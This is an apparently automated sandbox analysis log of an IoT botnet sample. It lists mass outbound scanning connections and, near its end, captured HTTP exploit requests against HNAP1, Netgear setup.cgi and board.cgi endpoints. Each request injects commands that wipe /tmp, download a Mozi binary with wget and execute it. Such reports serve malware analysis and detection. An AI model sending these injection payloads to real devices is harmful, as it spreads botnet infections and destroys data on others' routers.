Source: global traffic TCP traffic: 192.168.2.23:33178 -> 159.53.131.234:37215
Source: global traffic TCP traffic: 192.168.2.23:37362 -> 102.178.177.181:5555
Source: global traffic TCP traffic: 192.168.2.23:53212 -> 21.39.215.59:81
Source: global traffic TCP traffic: 192.168.2.23:40242 -> 98.185.128.95:5555
Source: global traffic TCP traffic: 192.168.2.23:45666 -> 38.56.136.31:52869
Source: global traffic TCP traffic: 192.168.2.23:36762 -> 80.170.149.84:8443
Source: global traffic TCP traffic: 192.168.2.23:36702 -> 69.130.148.70:49152
Source: global traffic TCP traffic: 192.168.2.23:59598 -> 6.81.141.27:8080
Source: global traffic TCP traffic: 192.168.2.23:59902 -> 25.205.100.246:81
Source: global traffic TCP traffic: 192.168.2.23:56246 -> 105.114.174.44:7574
Source: global traffic TCP traffic: 192.168.2.23:33146 -> 85.21.183.18:5555
Source: global traffic TCP traffic: 192.168.2.23:34962 -> 200.30.182.162:8080
Source: global traffic TCP traffic: 192.168.2.23:60626 -> 82.72.254.135:52869
Source: global traffic TCP traffic: 192.168.2.23:39840 -> 193.15.121.211:8080
Source: global traffic TCP traffic: 192.168.2.23:33400 -> 132.66.136.113:5555
Source: global traffic TCP traffic: 192.168.2.23:37124 -> 65.146.214.17:8080
Source: global traffic TCP traffic: 192.168.2.23:54814 -> 1.96.160.227:8443
Source: global traffic TCP traffic: 192.168.2.23:38728 -> 221.14.154.237:52869
Source: global traffic TCP traffic: 192.168.2.23:49170 -> 106.207.31.42:37215
Source: global traffic TCP traffic: 192.168.2.23:49594 -> 17.155.133.186:8080
Source: global traffic TCP traffic: 192.168.2.23:53268 -> 42.96.155.198:8080
Source: global traffic TCP traffic: 192.168.2.23:49856 -> 13.179.223.51:7574
Source: global traffic TCP traffic: 192.168.2.23:49724 -> 156.85.55.226:8080
Source: global traffic TCP traffic: 192.168.2.23:58876 -> 218.37.29.95:8443
Source: global traffic TCP traffic: 192.168.2.23:38898 -> 13.114.126.223:7574
Source: global traffic TCP traffic: 192.168.2.23:37018 -> 30.105.245.140:37215
Source: global traffic TCP traffic: 192.168.2.23:41886 -> 215.12.30.118:8443
Source: global traffic TCP traffic: 192.168.2.23:52512 -> 148.61.32.77:8080
Source: global traffic TCP traffic: 192.168.2.23:54308 -> 162.42.33.248:7574
Source: global traffic TCP traffic: 192.168.2.23:47790 -> 14.90.236.66:8443
Source: global traffic TCP traffic: 192.168.2.23:57668 -> 219.15.124.216:81
Source: global traffic TCP traffic: 192.168.2.23:47442 -> 25.187.113.148:52869
Source: global traffic TCP traffic: 192.168.2.23:43616 -> 164.97.186.164:37215
Source: global traffic TCP traffic: 192.168.2.23:47840 -> 45.11.203.66:8080
Source: global traffic TCP traffic: 192.168.2.23:59078 -> 94.94.0.80:8080
Source: global traffic TCP traffic: 192.168.2.23:42394 -> 61.49.51.88:5555
Source: global traffic TCP traffic: 192.168.2.23:47564 -> 131.127.87.223:5555
Source: global traffic TCP traffic: 192.168.2.23:47500 -> 74.234.73.124:81
Source: global traffic TCP traffic: 192.168.2.23:40914 -> 217.92.174.104:7574
Source: global traffic TCP traffic: 192.168.2.23:54538 -> 84.193.104.66:8080
Source: global traffic TCP traffic: 192.168.2.23:53046 -> 86.84.186.192:52869
Source: global traffic TCP traffic: 192.168.2.23:42506 -> 108.195.125.48:8443
Source: global traffic TCP traffic: 192.168.2.23:37400 -> 36.111.14.198:5555
Source: global traffic TCP traffic: 192.168.2.23:47424 -> 141.226.201.89:8443
Source: global traffic TCP traffic: 192.168.2.23:34258 -> 105.5.127.26:7574
Source: global traffic TCP traffic: 192.168.2.23:54214 -> 31.170.238.219:5555
Source: global traffic TCP traffic: 192.168.2.23:46798 -> 131.140.163.250:8080
Source: global traffic TCP traffic: 192.168.2.23:46798 -> 155.59.30.234:49152
Source: global traffic TCP traffic: 192.168.2.23:50428 -> 165.34.185.242:8443
Source: global traffic TCP traffic: 192.168.2.23:35994 -> 163.251.81.119:8443
Source: global traffic TCP traffic: 192.168.2.23:42166 -> 193.2.18.134:52869
Source: global traffic TCP traffic: 192.168.2.23:45056 -> 204.62.24.224:5555
Source: global traffic TCP traffic: 192.168.2.23:37344 -> 7.90.208.52:8080
Source: global traffic TCP traffic: 192.168.2.23:36028 -> 148.33.75.74:8443
Source: global traffic TCP traffic: 192.168.2.23:44194 -> 52.222.67.233:7574
Source: global traffic TCP traffic: 192.168.2.23:44696 -> 145.40.158.93:49152
Source: global traffic TCP traffic: 192.168.2.23:50042 -> 118.194.168.68:81
Source: global traffic TCP traffic: 192.168.2.23:39674 -> 156.228.159.201:49152
Source: global traffic TCP traffic: 192.168.2.23:46028 -> 33.148.174.72:5555
Source: global traffic TCP traffic: 192.168.2.23:33236 -> 62.124.228.151:37215
Source: global traffic TCP traffic: 192.168.2.23:40038 -> 120.128.148.177:8080
Source: global traffic TCP traffic: 192.168.2.23:33696 -> 220.163.161.225:52869
Source: global traffic TCP traffic: 192.168.2.23:53012 -> 207.237.147.66:52869
Source: global traffic TCP traffic: 192.168.2.23:51216 -> 125.224.119.246:37215
Source: global traffic TCP traffic: 192.168.2.23:48314 -> 205.183.102.146:8443
Source: global traffic TCP traffic: 192.168.2.23:43272 -> 168.71.141.38:8080
Source: global traffic TCP traffic: 192.168.2.23:50380 -> 90.50.219.167:7574
Source: global traffic TCP traffic: 192.168.2.23:50278 -> 200.54.176.233:8080
Source: global traffic TCP traffic: 192.168.2.23:36458 -> 11.65.199.68:81
Source: global traffic TCP traffic: 192.168.2.23:58576 -> 169.229.168.20:8080
Source: global traffic TCP traffic: 192.168.2.23:53690 -> 164.182.234.67:49152
Source: global traffic TCP traffic: 192.168.2.23:42948 -> 177.52.181.55:52869
Source: global traffic TCP traffic: 192.168.2.23:57888 -> 176.107.239.103:49152
Source: global traffic TCP traffic: 192.168.2.23:50330 -> 168.19.18.184:8080
Source: global traffic TCP traffic: 192.168.2.23:52212 -> 9.115.138.146:52869
Source: global traffic TCP traffic: 192.168.2.23:44700 -> 154.74.21.50:52869
Source: global traffic TCP traffic: 192.168.2.23:52934 -> 218.136.34.104:52869
Source: global traffic TCP traffic: 192.168.2.23:47538 -> 133.1.38.1:7574
Source: global traffic TCP traffic: 192.168.2.23:49578 -> 82.43.146.188:5555
Source: global traffic TCP traffic: 192.168.2.23:36116 -> 98.184.232.220:5555
Source: global traffic TCP traffic: 192.168.2.23:38712 -> 28.28.172.125:8080
Source: global traffic TCP traffic: 192.168.2.23:58504 -> 215.177.126.237:5555
Source: global traffic TCP traffic: 192.168.2.23:34626 -> 212.25.172.245:8443
Source: global traffic TCP traffic: 192.168.2.23:50066 -> 199.151.219.179:8080
Source: global traffic TCP traffic: 192.168.2.23:41610 -> 215.49.164.139:8080
Source: global traffic TCP traffic: 192.168.2.23:57000 -> 40.4.221.62:52869
Source: global traffic TCP traffic: 192.168.2.23:51922 -> 190.10.107.49:49152
Source: global traffic TCP traffic: 192.168.2.23:55636 -> 211.156.119.221:7574
Source: global traffic TCP traffic: 192.168.2.23:40906 -> 35.155.60.67:8443
Source: global traffic TCP traffic: 192.168.2.23:48216 -> 44.63.82.120:8080
Source: global traffic TCP traffic: 192.168.2.23:54598 -> 216.128.208.88:37215
Source: global traffic TCP traffic: 192.168.2.23:39634 -> 71.104.240.120:81
Source: global traffic TCP traffic: 192.168.2.23:51294 -> 18.176.207.149:5555
Source: global traffic TCP traffic: 192.168.2.23:52544 -> 15.101.151.43:52869
Source: global traffic TCP traffic: 192.168.2.23:33436 -> 143.108.194.67:8080
Source: global traffic TCP traffic: 192.168.2.23:55034 -> 144.181.144.68:52869
Source: global traffic TCP traffic: 192.168.2.23:37802 -> 179.240.110.165:7574
Source: global traffic TCP traffic: 192.168.2.23:44740 -> 155.228.124.104:8080
Source: global traffic TCP traffic: 192.168.2.23:60950 -> 63.246.72.186:5555
Source: global traffic TCP traffic: 192.168.2.23:51486 -> 85.12.92.30:52869
Source: global traffic TCP traffic: 192.168.2.23:33980 -> 1.221.184.90:8443
Source: global traffic TCP traffic: 192.168.2.23:56182 -> 5.193.99.233:5555
Source: global traffic TCP traffic: 192.168.2.23:53406 -> 69.39.1.150:81
Source: global traffic TCP traffic: 192.168.2.23:35818 -> 19.25.109.75:5555
Source: global traffic TCP traffic: 192.168.2.23:42418 -> 154.3.70.165:52869
Source: global traffic TCP traffic: 192.168.2.23:45904 -> 92.64.116.169:8080
Source: global traffic TCP traffic: 192.168.2.23:40998 -> 37.111.61.238:7574
Source: global traffic TCP traffic: 192.168.2.23:54178 -> 81.100.132.120:81
Source: global traffic TCP traffic: 192.168.2.23:59648 -> 178.50.243.15:8080
Source: global traffic TCP traffic: 192.168.2.23:52468 -> 17.252.58.84:52869
Source: global traffic TCP traffic: 192.168.2.23:58258 -> 32.6.155.101:8443
Source: global traffic TCP traffic: 192.168.2.23:53220 -> 153.253.250.183:8080
Source: global traffic TCP traffic: 192.168.2.23:37116 -> 31.189.179.101:8080
Source: global traffic TCP traffic: 192.168.2.23:45464 -> 25.215.228.98:52869
Source: global traffic TCP traffic: 192.168.2.23:38822 -> 211.216.79.68:81
Source: global traffic TCP traffic: 192.168.2.23:51654 -> 39.94.96.15:8080
Source: global traffic TCP traffic: 192.168.2.23:46064 -> 71.153.153.217:8080
Source: global traffic TCP traffic: 192.168.2.23:42498 -> 99.50.2.56:8080
Source: global traffic TCP traffic: 192.168.2.23:48130 -> 72.173.127.108:52869
Source: global traffic TCP traffic: 192.168.2.23:53670 -> 201.73.174.30:8080
Source: global traffic TCP traffic: 192.168.2.23:39728 -> 27.210.106.201:81
Source: global traffic TCP traffic: 192.168.2.23:35532 -> 19.145.133.190:8443
Source: global traffic TCP traffic: 192.168.2.23:56036 -> 173.56.116.221:5555
Source: global traffic TCP traffic: 192.168.2.23:52720 -> 134.155.202.147:81
Source: global traffic TCP traffic: 192.168.2.23:49654 -> 70.48.69.248:49152
Source: global traffic TCP traffic: 192.168.2.23:49860 -> 201.111.250.175:8080
Source: global traffic TCP traffic: 192.168.2.23:33480 -> 129.51.36.251:8443
Source: global traffic TCP traffic: 192.168.2.23:47696 -> 139.19.220.55:37215
Source: global traffic TCP traffic: 192.168.2.23:43446 -> 184.222.249.119:8080
Source: global traffic TCP traffic: 192.168.2.23:43958 -> 24.238.27.240:49152
Source: global traffic TCP traffic: 192.168.2.23:34530 -> 103.35.248.174:81
Source: global traffic TCP traffic: 192.168.2.23:43112 -> 9.3.250.91:52869
Source: global traffic TCP traffic: 192.168.2.23:58036 -> 92.47.126.52:37215
Source: global traffic TCP traffic: 192.168.2.23:53866 -> 198.210.105.185:8080
Source: global traffic TCP traffic: 192.168.2.23:41062 -> 95.93.72.253:8080
Source: global traffic TCP traffic: 192.168.2.23:47794 -> 5.239.244.150:5555
Source: global traffic TCP traffic: 192.168.2.23:54338 -> 16.191.137.51:49152
Source: global traffic TCP traffic: 192.168.2.23:39012 -> 213.147.130.22:5555
Source: global traffic TCP traffic: 192.168.2.23:56796 -> 165.144.62.218:49152
Source: global traffic TCP traffic: 192.168.2.23:42140 -> 116.15.105.36:49152
Source: global traffic TCP traffic: 192.168.2.23:44744 -> 191.91.172.135:81
Source: global traffic TCP traffic: 192.168.2.23:51906 -> 164.203.140.197:8443
Source: global traffic TCP traffic: 192.168.2.23:42292 -> 183.233.97.199:81
Source: global traffic TCP traffic: 192.168.2.23:33536 -> 99.75.40.85:5555
Source: global traffic TCP traffic: 192.168.2.23:50258 -> 143.12.16.95:81
Source: global traffic TCP traffic: 192.168.2.23:36534 -> 49.134.111.32:81
Source: global traffic TCP traffic: 192.168.2.23:35398 -> 57.82.230.159:49152
Source: global traffic TCP traffic: 192.168.2.23:42964 -> 160.103.148.21:8080
Source: global traffic TCP traffic: 192.168.2.23:46530 -> 3.65.219.187:8080
Source: global traffic TCP traffic: 192.168.2.23:37748 -> 99.104.23.16:5555
Source: global traffic TCP traffic: 192.168.2.23:35642 -> 161.90.239.127:81
Source: global traffic TCP traffic: 192.168.2.23:35932 -> 175.55.189.249:49152
Source: global traffic TCP traffic: 192.168.2.23:49860 -> 44.10.172.94:8080
Source: global traffic TCP traffic: 192.168.2.23:34222 -> 58.188.8.201:81
Source: global traffic TCP traffic: 192.168.2.23:46606 -> 217.240.175.223:8443
Source: global traffic TCP traffic: 192.168.2.23:43640 -> 150.92.135.209:8443
Source: global traffic TCP traffic: 192.168.2.23:35866 -> 171.0.70.67:8443
Source: global traffic TCP traffic: 192.168.2.23:54262 -> 114.141.176.152:8080
Source: global traffic TCP traffic: 192.168.2.23:60014 -> 158.20.189.8:49152
Source: global traffic TCP traffic: 192.168.2.23:49684 -> 29.141.33.158:81
Source: global traffic TCP traffic: 192.168.2.23:43302 -> 93.125.7.219:52869
Source: global traffic TCP traffic: 192.168.2.23:36810 -> 185.229.210.149:49152
Source: global traffic TCP traffic: 192.168.2.23:56438 -> 58.209.254.107:8080
Source: global traffic TCP traffic: 192.168.2.23:54174 -> 11.4.161.251:8080
Source: global traffic TCP traffic: 192.168.2.23:59508 -> 56.221.62.216:8080
Source: global traffic TCP traffic: 192.168.2.23:47830 -> 104.124.138.162:7574
Source: global traffic TCP traffic: 192.168.2.23:42214 -> 159.30.123.214:8080
Source: global traffic TCP traffic: 192.168.2.23:55192 -> 112.92.126.161:81
Source: global traffic TCP traffic: 192.168.2.23:56302 -> 32.214.208.69:8080
Source: global traffic TCP traffic: 192.168.2.23:36968 -> 222.194.111.214:81
Source: global traffic TCP traffic: 192.168.2.23:53400 -> 136.135.67.3:37215
Source: global traffic TCP traffic: 192.168.2.23:58932 -> 108.102.15.248:49152
Source: global traffic TCP traffic: 192.168.2.23:54988 -> 152.32.239.105:7574
Source: global traffic TCP traffic: 192.168.2.23:40172 -> 119.86.10.222:8080
Source: global traffic TCP traffic: 192.168.2.23:47458 -> 188.196.133.125:7574
Source: global traffic TCP traffic: 192.168.2.23:60924 -> 108.98.47.191:7574
Source: global traffic TCP traffic: 192.168.2.23:33518 -> 217.253.146.237:8080
Source: global traffic TCP traffic: 192.168.2.23:59722 -> 69.108.114.191:8080
Source: global traffic TCP traffic: 192.168.2.23:53618 -> 54.145.80.37:7574
Source: global traffic TCP traffic: 192.168.2.23:60268 -> 167.186.88.61:8080
Source: global traffic TCP traffic: 192.168.2.23:36812 -> 13.176.101.116:5555
Source: global traffic TCP traffic: 192.168.2.23:37730 -> 123.220.165.29:52869
Source: global traffic TCP traffic: 192.168.2.23:49306 -> 101.128.14.171:8080
Source: global traffic TCP traffic: 192.168.2.23:46712 -> 71.237.233.27:8080
Source: global traffic TCP traffic: 192.168.2.23:54394 -> 97.214.225.77:8080
Source: global traffic TCP traffic: 192.168.2.23:60920 -> 175.159.51.155:8443
Source: global traffic TCP traffic: 192.168.2.23:60302 -> 80.165.24.201:49152
Source: global traffic TCP traffic: 192.168.2.23:57046 -> 110.227.113.91:7574
Source: global traffic TCP traffic: 192.168.2.23:52702 -> 190.44.47.65:7574
Source: global traffic TCP traffic: 192.168.2.23:51742 -> 179.189.34.214:8080
Source: global traffic TCP traffic: 192.168.2.23:36874 -> 39.78.92.24:5555
Source: global traffic TCP traffic: 192.168.2.23:50072 -> 61.136.166.60:7574
Source: global traffic TCP traffic: 192.168.2.23:47324 -> 180.56.181.78:8443
Source: global traffic TCP traffic: 192.168.2.23:39020 -> 25.124.19.1:8080
Source: global traffic TCP traffic: 192.168.2.23:37468 -> 163.70.239.141:8080
Source: global traffic TCP traffic: 192.168.2.23:56534 -> 154.209.186.99:8080
Source: global traffic TCP traffic: 192.168.2.23:56168 -> 156.79.252.244:37215
Source: global traffic TCP traffic: 192.168.2.23:41450 -> 150.183.254.151:8443
Source: global traffic TCP traffic: 192.168.2.23:59576 -> 128.99.50.75:8443
Source: global traffic TCP traffic: 192.168.2.23:33750 -> 207.23.195.29:52869
Source: global traffic TCP traffic: 192.168.2.23:51780 -> 35.157.254.248:81
Source: global traffic TCP traffic: 192.168.2.23:43076 -> 44.87.62.109:52869
Source: global traffic TCP traffic: 192.168.2.23:41696 -> 204.222.113.90:52869
Source: global traffic TCP traffic: 192.168.2.23:37926 -> 196.90.18.214:8080
Source: global traffic TCP traffic: 192.168.2.23:54196 -> 74.40.185.41:49152
Source: global traffic TCP traffic: 192.168.2.23:48750 -> 50.183.64.105:37215
Source: global traffic TCP traffic: 192.168.2.23:57648 -> 189.5.17.154:49152
Source: global traffic TCP traffic: 192.168.2.23:36196 -> 87.218.139.104:5555
Source: global traffic TCP traffic: 192.168.2.23:56564 -> 141.39.142.235:49152
Source: global traffic TCP traffic: 192.168.2.23:34032 -> 173.168.230.134:5555
Source: global traffic TCP traffic: 192.168.2.23:42898 -> 135.132.50.2:8080
Source: global traffic TCP traffic: 192.168.2.23:43430 -> 155.117.206.189:7574
Source: global traffic TCP traffic: 192.168.2.23:60896 -> 187.123.230.15:49152
Source: global traffic TCP traffic: 192.168.2.23:47806 -> 30.183.116.123:52869
Source: global traffic TCP traffic: 192.168.2.23:38182 -> 15.47.138.219:7574
Source: global traffic TCP traffic: 192.168.2.23:41508 -> 106.99.159.31:37215
Source: global traffic TCP traffic: 192.168.2.23:32996 -> 93.179.249.7:52869
Source: global traffic TCP traffic: 192.168.2.23:33710 -> 86.149.250.90:81
Source: global traffic TCP traffic: 192.168.2.23:56454 -> 1.186.104.107:37215
Source: global traffic TCP traffic: 192.168.2.23:45788 -> 17.37.210.45:8080
Source: global traffic TCP traffic: 192.168.2.23:33682 -> 154.40.176.203:8080
Source: global traffic TCP traffic: 192.168.2.23:60478 -> 18.96.20.44:7574
Source: global traffic TCP traffic: 192.168.2.23:52610 -> 37.75.243.243:8080
Source: global traffic TCP traffic: 192.168.2.23:34644 -> 167.25.83.96:8080
Source: global traffic TCP traffic: 192.168.2.23:35996 -> 39.139.127.27:8443
Source: global traffic TCP traffic: 192.168.2.23:53524 -> 28.49.67.223:7574
Source: global traffic TCP traffic: 192.168.2.23:52930 -> 142.88.201.162:8443
Source: global traffic TCP traffic: 192.168.2.23:37750 -> 180.24.184.106:37215
Source: global traffic TCP traffic: 192.168.2.23:42132 -> 33.4.10.136:8080
Source: global traffic TCP traffic: 192.168.2.23:50096 -> 180.80.137.123:37215
Source: global traffic TCP traffic: 192.168.2.23:51034 -> 131.143.33.147:49152
Source: global traffic TCP traffic: 192.168.2.23:45856 -> 203.30.37.220:81
Source: global traffic TCP traffic: 192.168.2.23:37320 -> 71.87.10.180:81
Source: /tmp/ZFvtIZszMd (PID: 5260) Socket: 0.0.0.0::42337 Jump to behavior
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 64.34.159.178:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 207.154.230.111:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 185.199.110.112:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 52.73.33.104:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 190.166.198.45:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 3.20.201.243:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 23.208.34.61:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 168.176.61.231:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
